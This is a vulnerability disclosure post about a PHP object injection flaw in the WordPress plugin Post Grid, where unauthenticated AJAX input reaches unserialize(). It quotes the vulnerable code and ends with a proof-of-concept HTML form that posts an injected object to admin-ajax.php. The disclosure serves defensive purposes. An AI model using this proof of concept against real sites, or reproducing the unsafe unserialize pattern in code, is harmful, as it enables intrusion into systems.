09 Jan

Vulnerability Details: PHP Object Injection Vulnerability in Post Grid

Back in November we were contacted about a PHP object injection vulnerability in the plugin Post Grid that the person who contacted us had seen exploited. We didn’t include it in our data at the time since they said they were waiting on the “developer to respond etc.” before disclosing it. While looking in to that vulnerability we discovered a file deletion vulnerability in the plugin, which impacted all the version that also had the PHP object injection vulnerability, so anyone using our service or the free data that comes with its companion plugin would have been notified that they were using a vulnerable plugin at the time.

Recently the issue of the vulnerability came up again and we noticed that it still hadn’t been disclosed. Seeing as it has now been two months since it was fixed we will go ahead with the disclosure.

As of version 2.0.11 the plugin made the function post_grid_import_content_layouts() available through WordPress AJAX functionality to those logged in to WordPress and those not logged in:

add_action('wp_ajax_post_grid_import_content_layouts', 'post_grid_import_content_layouts'); 
add_action('wp_ajax_nopriv_post_grid_import_content_layouts', 'post_grid_import_content_layouts');

That function passes the value of the POST input “layouts_data” through the function unserialize(), which allows the possibility of PHP object injection to occur:

function post_grid_import_content_layouts(){
	$layouts_data = stripslashes($_POST['layouts_data']);
	$layouts_data = unserialize($layouts_data);

Proof of Concept

The following proof of concept will cause the specified object to be injected.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[Object to be Injected]” with the object to be injected.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="post_grid_import_content_layouts" />
<input type="hidden" name="layouts_data" value="[Object to be Injected]" />
<input type="submit" value="Submit" />